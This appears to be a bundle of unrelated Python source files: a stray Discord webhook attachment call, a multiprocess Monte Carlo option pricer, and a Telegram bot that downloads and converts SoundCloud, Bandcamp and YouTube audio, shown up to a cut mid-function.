response = discord_post_attachment('userName', 'test', 'C:\\Users\\TrevisanGMW\\Desktop\\testFile.txt', gt_mtod_settings_submit_ss.get('discord_webhook'))
|
monte_carlo.py
|
"""
For each path of simulation, the final price is:
St = spot * exp((b - vol*vol/2) * T + vol * rand * sqrt(T))
where rand is a random number in (0, 1)
call option:
each_price = max(St - strike, 0)
put option:
each_price = max(strike - St, 0)
The overall price is:
sum(each_price) * exp(rate * T) / simu_num
"""
from math import exp, sqrt
from multiprocessing import Process, Queue
from random import random
from options.functions import norminv
from options.option import OptionType
# from scipy.stats import norm # norm.ppf is about 50 times slower than norminv but no obvious accuracy improvement
class MonteCarloPricer:
def __init__(self, simu_num=1000000, ps_num=10):
self.simu_num = simu_num
self.ps_num = ps_num
def set_ps_num(self, ps_num):
self.ps_num = ps_num
def get_price_of_one_run(self, z):
'''Run the simulation once and return the option price'''
#st = self.spot * exp((self.cost_of_carry - self.vol**2 / 2) * self.expiry + self.vol * norm.ppf(random()) * sqrt(self.expiry))
st = self.spot * exp((self.cost_of_carry - self.vol**2 / 2) * self.expiry + self.vol * norminv(random()) * sqrt(self.expiry))
return max(z * (st - self.strike), 0)
def _ps_slice(self, z, num, resultq):
sum = 0
for i in range(int(num)):
sum += self.get_price_of_one_run(z)
resultq.put(sum)
resultq.close()
def price_option(self, option):
"""
simu_num: the number of simulation runs, usually > 100000
ps_num: If zero, run simulation in single process mode;
otherwise run in multiprocess mode with ps_num processes to speed up
"""
self.spot = option.spot
self.strike = option.strike
self.rate = option.rate
self.expiry = option.expiry
self.vol = option.vol
self.cost_of_carry = option.cost_of_carry or option.rate
z = 1 if option.type == OptionType.CALL else -1
sum = 0
if self.ps_num:
# multiprocess mode
if (self.simu_num / self.ps_num <= 1000): # when > 1000, simu_num / ps_num ~= simu_num / ps_num +- simu_num % ps_num
assert not self.simu_num % self.ps_num, \
'simu_num must be integer times of ps_num; received simu_num: {}, ps_num: {}'.format(self.simu_num, self.ps_num)
resultq = Queue()
processes = [Process(target=self._ps_slice, args=(z, self.simu_num / self.ps_num, resultq)) for i in range(self.ps_num)]
for p in processes:
p.start()
for p in processes:
p.join()
while not resultq.empty():
sum += resultq.get()
else:
# single process mode
for i in range(self.simu_num):
sum += self.get_price_of_one_run(z)
return round(exp(- self.rate * self.expiry) * sum / self.simu_num, 4)
|
scdlbot.py
|
# -*- coding: utf-8 -*-
"""Main module."""
import gc
import pathlib
import random
import shelve
import shutil
from datetime import datetime
from multiprocessing import Process, Queue
from queue import Empty
from subprocess import PIPE, TimeoutExpired # skipcq: BAN-B404
from urllib.parse import urljoin, urlparse
from uuid import uuid4
import ffmpeg
from boltons.urlutils import find_all_links
from mutagen.id3 import ID3
from mutagen.mp3 import EasyMP3 as MP3
from prometheus_client import Summary
from telegram import (Message, Chat, ChatMember, MessageEntity, ChatAction, InlineKeyboardMarkup,
InlineKeyboardButton, InlineQueryResultAudio, Update)
from telegram.error import (TelegramError, Unauthorized, BadRequest,
TimedOut, ChatMigrated, NetworkError)
from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler,
CallbackQueryHandler, CallbackContext)
from telegram.ext.dispatcher import run_async
from scdlbot.utils import *
logger = logging.getLogger(__name__)
REQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request')
class ScdlBot:
def __init__(self, tg_bot_token, tg_bot_api="https://api.telegram.org", proxies=None,
store_chat_id=None, no_flood_chat_ids=None, alert_chat_ids=None,
dl_dir="/tmp/scdlbot", dl_timeout=300, max_tg_file_size=45_000_000, max_convert_file_size=80_000_000,
chat_storage_file="/tmp/scdlbotdata", app_url=None,
serve_audio=False, cookies_file=None, source_ips=None):
self.SITES = {
"sc": "soundcloud",
"scapi": "api.soundcloud",
"bc": "bandcamp",
"yt": "youtu",
}
self.APP_URL = app_url
self.DL_TIMEOUT = dl_timeout
self.TG_BOT_API = tg_bot_api
self.MAX_TG_FILE_SIZE = max_tg_file_size
self.MAX_CONVERT_FILE_SIZE = max_convert_file_size
self.SERVE_AUDIO = serve_audio
if self.SERVE_AUDIO:
self.MAX_TG_FILE_SIZE = 19_000_000
self.HELP_TEXT = get_response_text('help.tg.md')
self.SETTINGS_TEXT = get_response_text('settings.tg.md')
self.DL_TIMEOUT_TEXT = get_response_text('dl_timeout.txt').format(self.DL_TIMEOUT // 60)
self.WAIT_BIT_TEXT = [get_response_text('wait_bit.txt'), get_response_text('wait_beat.txt'),
get_response_text('wait_beet.txt')]
self.NO_AUDIO_TEXT = get_response_text('no_audio.txt')
self.NO_URLS_TEXT = get_response_text('no_urls.txt')
self.OLG_MSG_TEXT = get_response_text('old_msg.txt')
self.REGION_RESTRICTION_TEXT = get_response_text('region_restriction.txt')
self.DIRECT_RESTRICTION_TEXT = get_response_text('direct_restriction.txt')
self.LIVE_RESTRICTION_TEXT = get_response_text('live_restriction.txt')
# self.chat_storage = {}
self.chat_storage = shelve.open(chat_storage_file, writeback=True)
for chat_id in no_flood_chat_ids:
self.init_chat(chat_id=chat_id, chat_type=Chat.PRIVATE if chat_id > 0 else Chat.SUPERGROUP, flood="no")
self.ALERT_CHAT_IDS = set(alert_chat_ids) if alert_chat_ids else set()
self.STORE_CHAT_ID = store_chat_id
self.DL_DIR = dl_dir
self.COOKIES_DOWNLOAD_FILE = "/tmp/scdlbot_cookies.txt"
self.proxies = proxies
self.source_ips = source_ips
# https://yandex.com/support/music-app-ios/search-and-listen/listening-abroad.html
self.cookies_file = cookies_file
# if sc_auth_token:
# config = configparser.ConfigParser()
# config['scdl'] = {}
# config['scdl']['path'] = self.DL_DIR
# config['scdl']['auth_token'] = sc_auth_token
# config_dir = os.path.join(os.path.expanduser('~'), '.config', 'scdl')
# config_path = os.path.join(config_dir, 'scdl.cfg')
# os.makedirs(config_dir, exist_ok=True)
# with open(config_path, 'w') as config_file:
# config.write(config_file)
self.updater = Updater(token=tg_bot_token, base_url=f"{self.TG_BOT_API}/bot", use_context=True, base_file_url=f"{self.TG_BOT_API}/file/bot")
dispatcher = self.updater.dispatcher
start_command_handler = CommandHandler('start', self.help_command_callback)
dispatcher.add_handler(start_command_handler)
help_command_handler = CommandHandler('help', self.help_command_callback)
dispatcher.add_handler(help_command_handler)
settings_command_handler = CommandHandler('settings', self.settings_command_callback)
dispatcher.add_handler(settings_command_handler)
dl_command_handler = CommandHandler('dl', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(dl_command_handler)
link_command_handler = CommandHandler('link', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(link_command_handler)
message_with_links_handler = MessageHandler(~Filters.update.edited_message & ~Filters.command &
((Filters.text & (Filters.entity(MessageEntity.URL) |
Filters.entity(MessageEntity.TEXT_LINK))) |
(Filters.caption & (Filters.caption_entity(MessageEntity.URL) |
Filters.caption_entity(
MessageEntity.TEXT_LINK)))),
self.common_command_callback)
dispatcher.add_handler(message_with_links_handler)
button_query_handler = CallbackQueryHandler(self.button_query_callback)
dispatcher.add_handler(button_query_handler)
inline_query_handler = InlineQueryHandler(self.inline_query_callback)
dispatcher.add_handler(inline_query_handler)
unknown_handler = MessageHandler(Filters.command, self.unknown_command_callback)
dispatcher.add_handler(unknown_handler)
dispatcher.add_error_handler(self.error_callback)
self.bot_username = self.updater.bot.get_me().username
self.RANT_TEXT_PRIVATE = "Read /help to learn how to use me"
self.RANT_TEXT_PUBLIC = "[Start me in PM to read help and learn how to use me](t.me/{}?start=1)".format(
self.bot_username)
def start(self, use_webhook=False, webhook_host="127.0.0.1", webhook_port=None, cert_file=None, cert_key_file=None,
url_path="scdlbot"):
if use_webhook:
self.updater.start_webhook(listen=webhook_host,
port=webhook_port,
url_path=url_path)
# cert=cert_file if cert_file else None,
# key=cert_key_file if cert_key_file else None,
# webhook_url=urljoin(app_url, url_path))
self.updater.bot.set_webhook(url=urljoin(self.APP_URL, url_path),
certificate=open(cert_file, 'rb') if cert_file else None)
else:
self.updater.start_polling()
logger.warning("Bot started")
self.updater.idle()
def unknown_command_callback(self, update: Update, context: CallbackContext):
pass
# bot.send_message(chat_id=update.message.chat_id, text="Unknown command")
def error_callback(self, update: Update, context: CallbackContext): # skipcq: PYL-R0201
try:
raise context.error
except Unauthorized:
# remove update.message.chat_id from conversation list
logger.debug('Update {} caused Unauthorized error: {}'.format(update, context.error))
except BadRequest:
# handle malformed requests - read more below!
logger.debug('Update {} caused BadRequest error: {}'.format(update, context.error))
except TimedOut:
# handle slow connection problems
logger.debug('Update {} caused TimedOut error: {}'.format(update, context.error))
except NetworkError:
# handle other connection problems
logger.debug('Update {} caused NetworkError: {}'.format(update, context.error))
except ChatMigrated as e:
# the chat_id of a group has changed, use e.new_chat_id instead
logger.debug('Update {} caused ChatMigrated error: {}'.format(update, context.error))
except TelegramError:
# handle all other telegram related errors
logger.debug('Update {} caused TelegramError: {}'.format(update, context.error))
def init_chat(self, message=None, chat_id=None, chat_type=None, flood="yes"):
if message:
chat_id = str(message.chat_id)
chat_type = message.chat.type
else:
chat_id = str(chat_id)
if chat_id not in self.chat_storage:
self.chat_storage[chat_id] = {}
if "settings" not in self.chat_storage[chat_id]:
self.chat_storage[chat_id]["settings"] = {}
if "mode" not in self.chat_storage[chat_id]["settings"]:
if chat_type == Chat.PRIVATE:
self.chat_storage[chat_id]["settings"]["mode"] = "dl"
else:
self.chat_storage[chat_id]["settings"]["mode"] = "ask"
if "flood" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["flood"] = flood
if "rant_msg_ids" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["rant_msg_ids"] = []
self.chat_storage.sync()
# logger.debug("Current chat_storage: %r", self.chat_storage)
def cleanup_chat(self, chat_id):
chat_msgs = self.chat_storage[str(chat_id)].copy()
for msg_id in chat_msgs:
if msg_id != "settings":
timedelta = datetime.now() - self.chat_storage[str(chat_id)][msg_id]["message"].date
if timedelta.days > 0:
self.chat_storage[str(chat_id)].pop(msg_id)
self.chat_storage.sync()
def rant_and_cleanup(self, bot, chat_id, rant_text, reply_to_message_id=None):
rant_msg = bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=rant_text, parse_mode='Markdown', disable_web_page_preview=True)
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "no":
rant_msgs = self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].copy()
for rant_msg_id in rant_msgs:
try:
bot.delete_message(chat_id=chat_id, message_id=rant_msg_id)
except:
pass
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].remove(rant_msg_id)
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].append(rant_msg.message_id)
self.chat_storage.sync()
def help_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
event_name = "help"
entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
for entity_value in entities.values():
event_name = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
log_and_track(event_name, update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if chat_type != Chat.PRIVATE and flood == "no":
self.rant_and_cleanup(context.bot, chat_id, self.RANT_TEXT_PUBLIC, reply_to_message_id=reply_to_message_id)
else:
context.bot.send_message(chat_id=chat_id, text=self.HELP_TEXT,
parse_mode='Markdown', disable_web_page_preview=True)
def get_wait_text(self):
return random.choice(self.WAIT_BIT_TEXT)
def get_settings_inline_keyboard(self, chat_id):
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
emoji_yes = "✅"
emoji_no = "❌"
button_dl = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "dl" else emoji_no, "Download"]),
callback_data=" ".join(["settings", "dl"]))
button_link = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "link" else emoji_no, "Links"]),
callback_data=" ".join(["settings", "link"]))
button_ask = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "ask" else emoji_no, "Ask"]),
callback_data=" ".join(["settings", "ask"]))
button_flood = InlineKeyboardButton(text=" ".join([emoji_yes if flood == "yes" else emoji_no, "Captions"]),
callback_data=" ".join(["settings", "flood"]))
button_close = InlineKeyboardButton(text=" ".join([emoji_no, "Close settings"]),
callback_data=" ".join(["settings", "close"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_ask], [button_flood, button_close]])
return inline_keyboard
def settings_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
log_and_track("settings")
chat_id = update.message.chat_id
context.bot.send_message(chat_id=chat_id, parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(chat_id),
text=self.SETTINGS_TEXT)
def common_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
command_entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
if not command_entities:
command_passed = False
# if no command then it is just a message and use default mode
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
else:
command_passed = True
# try to determine mode from command
mode = None
for entity_value in command_entities.values():
mode = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
if not mode:
mode = "dl"
if command_passed and not context.args:
rant_text = self.RANT_TEXT_PRIVATE if chat_type == Chat.PRIVATE else self.RANT_TEXT_PUBLIC
rant_text += "\nYou can simply send message with links (to download) OR command as `/{} <links>`.".format(
mode)
self.rant_and_cleanup(context.bot, chat_id, rant_text, reply_to_message_id=reply_to_message_id)
return
# apologize and send TYPING: always in PM and only when it's command in non-PM
apologize = chat_type == Chat.PRIVATE or command_passed
if apologize:
context.bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)
source_ip = None
proxy = None
if self.source_ips:
source_ip = random.choice(self.source_ips)
if self.proxies:
proxy = random.choice(self.proxies)
# TODO find working IP?
urls = self.prepare_urls(msg_or_text=update.message,
direct_urls=(mode == "link"),
source_ip=source_ip, proxy=proxy)
logger.debug(urls)
if not urls:
if apologize:
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_URLS_TEXT, parse_mode='Markdown')
else:
event_name = ("{}_cmd".format(mode)) if command_passed else ("{}_msg".format(mode))
log_and_track(event_name, update.message)
if mode == "dl":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif mode == "link":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif mode == "ask":
# ask: always in PM and only if good urls exist in non-PM
if chat_type == Chat.PRIVATE or "http" in " ".join(urls.values()):
orig_msg_id = str(reply_to_message_id)
self.chat_storage[str(chat_id)][orig_msg_id] = {"message": update.message, "urls": urls,
"source_ip": source_ip, "proxy": proxy}
question = "🎶 links found, what to do?"
button_dl = InlineKeyboardButton(text="✅ Download", callback_data=" ".join([orig_msg_id, "dl"]))
button_link = InlineKeyboardButton(text="❇️ Links",
callback_data=" ".join([orig_msg_id, "link"]))
button_cancel = InlineKeyboardButton(text="❎", callback_data=" ".join([orig_msg_id, "nodl"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_cancel]])
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
reply_markup=inline_keyboard, text=question)
self.cleanup_chat(chat_id)
def button_query_callback(self, update: Update, context: CallbackContext):
btn_msg = update.callback_query.message
self.init_chat(btn_msg)
user_id = update.callback_query.from_user.id
btn_msg_id = btn_msg.message_id
chat = btn_msg.chat
chat_id = chat.id
chat_type = chat.type
orig_msg_id, action = update.callback_query.data.split()
if orig_msg_id == "settings":
if chat_type != Chat.PRIVATE:
chat_member_status = chat.get_member(user_id).status
if chat_member_status not in [ChatMember.ADMINISTRATOR,
ChatMember.CREATOR] and user_id not in self.ALERT_CHAT_IDS:
log_and_track("settings_fail")
update.callback_query.answer(text="You're not chat admin")
return
log_and_track("settings_{}".format(action), btn_msg)
if action == "close":
context.bot.delete_message(chat_id, btn_msg_id)
else:
setting_changed = False
if action in ["dl", "link", "ask"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["mode"]
if action != current_setting:
setting_changed = True
self.chat_storage[str(chat_id)]["settings"]["mode"] = action
elif action in ["flood"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["flood"]
setting_changed = True
self.chat_storage[str(chat_id)]["settings"][action] = "no" if current_setting == "yes" else "yes"
if setting_changed:
self.chat_storage.sync()
update.callback_query.answer(text="Settings changed")
update.callback_query.edit_message_reply_markup(parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(
chat_id))
else:
update.callback_query.answer(text="Settings not changed")
elif orig_msg_id in self.chat_storage[str(chat_id)]:
msg_from_storage = self.chat_storage[str(chat_id)].pop(orig_msg_id)
orig_msg = msg_from_storage["message"]
urls = msg_from_storage["urls"]
source_ip = msg_from_storage["source_ip"]
proxy = msg_from_storage["proxy"]
log_and_track("{}_msg".format(action), orig_msg)
if action == "dl":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=orig_msg_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif action == "link":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
urls = self.prepare_urls(urls.keys(), direct_urls=True, source_ip=source_ip, proxy=proxy)
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=orig_msg_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif action == "nodl":
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
else:
update.callback_query.answer(text=self.OLG_MSG_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
def inline_query_callback(self, update: Update, context: CallbackContext):
log_and_track("link_inline")
inline_query_id = update.inline_query.id
text = update.inline_query.query
results = []
urls = self.prepare_urls(msg_or_text=text, direct_urls=True)
for url in urls:
for direct_url in urls[url].splitlines(): # TODO: fix non-mp3 and allow only sc/bc
logger.debug(direct_url)
results.append(
InlineQueryResultAudio(id=str(uuid4()), audio_url=direct_url, title="FAST_INLINE_DOWNLOAD"))
try:
context.bot.answer_inline_query(inline_query_id, results)
except:
pass
def prepare_urls(self, msg_or_text, direct_urls=False, source_ip=None, proxy=None):
if isinstance(msg_or_text, Message):
urls = []
url_entities = msg_or_text.parse_entities(types=[MessageEntity.URL])
url_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.URL])
url_entities.update(url_caption_entities)
for entity in url_entities:
url_str = url_entities[entity]
logger.debug("Entity URL Parsed: %s", url_str)
if "://" not in url_str:
url_str = "http://{}".format(url_str)
urls.append(URL(url_str))
text_link_entities = msg_or_text.parse_entities(types=[MessageEntity.TEXT_LINK])
text_link_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.TEXT_LINK])
text_link_entities.update(text_link_caption_entities)
for entity in text_link_entities:
url_str = entity.url
logger.debug("Entity Text Link Parsed: %s", url_str)
urls.append(URL(url_str))
else:
urls = find_all_links(msg_or_text, default_scheme="http")
urls_dict = {}
for url_item in urls:
url = url_item
# unshorten soundcloud.app.goo.gl and other links, but not tiktok:
if "tiktok" not in url_item.host:
try:
url = URL(requests.head(url_item, allow_redirects=True).url)
except:
pass
url_text = url.to_text(True)
#FIXME crutch:
url_text = url_text.replace("m.soundcloud.com", "soundcloud.com")
url_parts_num = len([part for part in url.path_parts if part])
try:
if (
# SoundCloud: tracks, sets and widget pages, no /you/ pages #TODO private sets are 5
(self.SITES["sc"] in url.host and (2 <= url_parts_num <= 4 or self.SITES["scapi"] in url_text) and (
not "you" in url.path_parts)) or
# Bandcamp: tracks and albums
(self.SITES["bc"] in url.host and (2 <= url_parts_num <= 2)) or
# YouTube: videos and playlists
(self.SITES["yt"] in url.host and (
"youtu.be" in url.host or "watch" in url.path or "playlist" in url.path))
):
if direct_urls or self.SITES["yt"] in url.host:
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
else:
urls_dict[url_text] = "http"
elif not any((site in url.host for site in self.SITES.values())):
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
except ProcessExecutionError:
logger.debug("youtube-dl get-url failed: %s", url_text)
except URLError as exc:
urls_dict[url_text] = exc.status
return urls_dict
@REQUEST_TIME.time()
@run_async
def download_url_and_send(self, bot, url, direct_urls, chat_id, reply_to_message_id=None,
wait_message_id=None, source_ip=None, proxy=None):
bot.send_chat_action(chat_id=chat_id, action=ChatAction.RECORD_AUDIO)
download_dir = os.path.join(self.DL_DIR, str(uuid4()))
shutil.rmtree(download_dir, ignore_errors=True)
os.makedirs(download_dir)
status = 0
if direct_urls == "direct":
status = -3
elif direct_urls == "country":
status = -4
elif direct_urls == "live":
status = -5
elif direct_urls == "timeout":
status = -6
else:
if (self.SITES["sc"] in url and self.SITES["scapi"] not in url) or (self.SITES["bc"] in url):
cmd_name = "scdl"
cmd_args = []
cmd = None
cmd_input = None
if self.SITES["sc"] in url and self.SITES["scapi"] not in url:
cmd = scdl_bin
cmd_name = str(cmd)
cmd_args = (
"-l", url, # URL of track/playlist/user
"-c", # Continue if a music already exist
"--path", download_dir, # Download the music to a custom path
"--onlymp3", # Download only the mp3 file even if the track is Downloadable
"--addtofile", # Add the artist name to the filename if it isn't in the filename already
"--addtimestamp",
# Adds the timestamp of the creation of the track to the title (useful to sort chronologically)
"--no-playlist-folder",
# Download playlist tracks into directory, instead of making a playlist subfolder
"--extract-artist", # Set artist tag from title instead of username
)
cmd_input = None
elif self.SITES["bc"] in url:
cmd = bandcamp_dl_bin
cmd_name = str(cmd)
cmd_args = (
"--base-dir", download_dir, # Base location of which all files are downloaded
"--template", "%{track} - %{artist} - %{title} [%{album}]", # Output filename template
"--overwrite", # Overwrite tracks that already exist
"--group", # Use album/track Label as iTunes grouping
"--embed-art", # Embed album art (if available)
"--no-slugify", # Disable slugification of track, album, and artist names
url, # URL of album/track
)
cmd_input = "yes"
logger.info("%s starts: %s", cmd_name, url)
cmd_proc = cmd[cmd_args].popen(stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)
try:
cmd_stdout, cmd_stderr = cmd_proc.communicate(input=cmd_input, timeout=self.DL_TIMEOUT)
cmd_retcode = cmd_proc.returncode
# TODO listed are common scdl problems for one track with 0 retcode, all its output is always in stderr:
if cmd_retcode or (any(err in cmd_stderr for err in ["Error resolving url", "is not streamable",
"Failed to get item"]) and ".mp3" not in cmd_stderr):
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
logger.info("%s succeeded: %s", cmd_name, url)
status = 1
except TimeoutExpired:
cmd_proc.kill()
logger.info("%s took too much time and dropped: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s failed: %s", cmd_name, url)
if status == 0:
cmd = youtube_dl_func
cmd_name = "youtube_dl_func"
# TODO: set different ydl_opts for different sites
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': os.path.join(download_dir, '%(title)s.%(ext)s'),
# default: %(autonumber)s - %(title)s-%(id)s.%(ext)s
'postprocessors': [
{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '128',
},
# {'key': 'EmbedThumbnail',}, {'key': 'FFmpegMetadata',},
],
}
host = urlparse(url).hostname
if host == "tiktok.com" or host.endswith(".tiktok.com"):
ydl_opts['postprocessors'] = []
ydl_opts['outtmpl'] = os.path.join(download_dir, 'tiktok.%(ext)s')
if proxy:
ydl_opts['proxy'] = proxy
if source_ip:
ydl_opts['source_address'] = source_ip
# https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/YoutubeDL.py#L210
if self.cookies_file:
if "http" in self.cookies_file:
ydl_opts['cookiefile'] = self.COOKIES_DOWNLOAD_FILE
else:
ydl_opts['cookiefile'] = self.cookies_file
queue = Queue()
cmd_args = (url, ydl_opts, queue,)
logger.info("%s inicia: %s", cmd_name, url)
cmd_proc = Process(target=cmd, args=cmd_args)
cmd_proc.start()
try:
cmd_retcode, cmd_stderr = queue.get(block=True, timeout=self.DL_TIMEOUT)
cmd_stdout = ""
cmd_proc.join()
if cmd_retcode:
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
# raise cmd_status #TODO: pass and re-raise original Exception?
logger.info("%s éxito: %s", cmd_name, url)
status = 1
except Empty:
cmd_proc.join(1)
if cmd_proc.is_alive():
cmd_proc.terminate()
logger.info("%s se tomó demasiado tiempo y se dejó caer: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s falló: %s", cmd_name, url)
status = -2
gc.collect()
if status in [-1, -6]:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DL_TIMEOUT_TEXT, parse_mode='Markdown')
elif status == -2:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_AUDIO_TEXT, parse_mode='Markdown')
elif status == -3:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DIRECT_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -4:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.REGION_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -5:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.LIVE_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == 1:
file_list = []
for d, dirs, files in os.walk(download_dir):
for file in files:
file_list.append(os.path.join(d, file))
if not file_list:
logger.info("No files in dir: %s", download_dir)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento, no he podido descargar ningún archivo de los enlaces proporcionados.",
parse_mode='Markdown')
else:
for file in sorted(file_list):
file_name = os.path.split(file)[-1]
file_parts = []
try:
file_parts = self.convert_and_split_audio_file(file)
except FileNotSupportedError as exc:
if not (exc.file_format in ["m3u", "jpg", "jpeg", "png", "finished", "tmp"]):
logger.warning("Formato de archivo no compatible: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento*, el archivo descargado `{}` está en un formato que aún no he podido convertir o enviar".format(
file_name),
parse_mode='Markdown')
except FileTooLargeError as exc:
logger.info("Archivo grande para convertir: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento, el archivo descargado tiene un tamaño de `{}` MB y es más grande de lo que puedo convertir (`{} MB`)".format(
file_name, exc.file_size // 1000000,
self.MAX_CONVERT_FILE_SIZE // 1000000),
parse_mode='Markdown')
except FileSplittedPartiallyError as exc:
file_parts = exc.file_parts
logger.exception("Falló la división: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento*, no hay suficiente memoria para convertir el archivo `{}`..".format(
file_name),
parse_mode='Markdown')
except FileNotConvertedError as exc:
logger.exception("Falló la división: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento*, no hay suficiente memoria para convertir el archivo `{}`..".format(
file_name),
parse_mode='Markdown')
try:
caption = None
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "yes":
addition = ""
url_obj = URL(url)
if self.SITES["yt"] in url_obj.host:
source = "YouTube"
file_root, file_ext = os.path.splitext(file_name)
file_title = file_root.replace(file_ext, "")
addition = ": " + file_title
elif self.SITES["sc"] in url_obj.host:
source = "SoundCloud"
elif self.SITES["bc"] in url_obj.host:
source = "Bandcamp"
else:
source = url_obj.host.replace(".com", "").replace("www.", "").replace("m.", "")
# if "youtu.be" in url_obj.host:
# url = url.replace("http://", "").replace("https://", "")
# else:
# url = shorten_url(url)
caption = "@{} _lo obtuve de_ [{}]({}){}".format(self.bot_username.replace("_", "\_"),
source, url, addition.replace("_", "\_"))
# logger.info(caption)
sent_audio_ids = self.send_audio_file_parts(bot, chat_id, file_parts,
reply_to_message_id if flood == "yes" else None,
caption)
except FileSentPartiallyError as exc:
sent_audio_ids = exc.sent_audio_ids
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento, no se ha podido enviar el archivo `{}` o algunas de sus partes..".format(
file_name),
parse_mode='Markdown')
logger.warning("El envío de algunas piezas ha fallado: %s", file_name)
if not self.SERVE_AUDIO:
shutil.rmtree(download_dir, ignore_errors=True)
if wait_message_id: # TODO: delete only once
try:
bot.delete_message(chat_id=chat_id, message_id=wait_message_id)
except:
pass
def convert_and_split_audio_file(self, file=""):
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
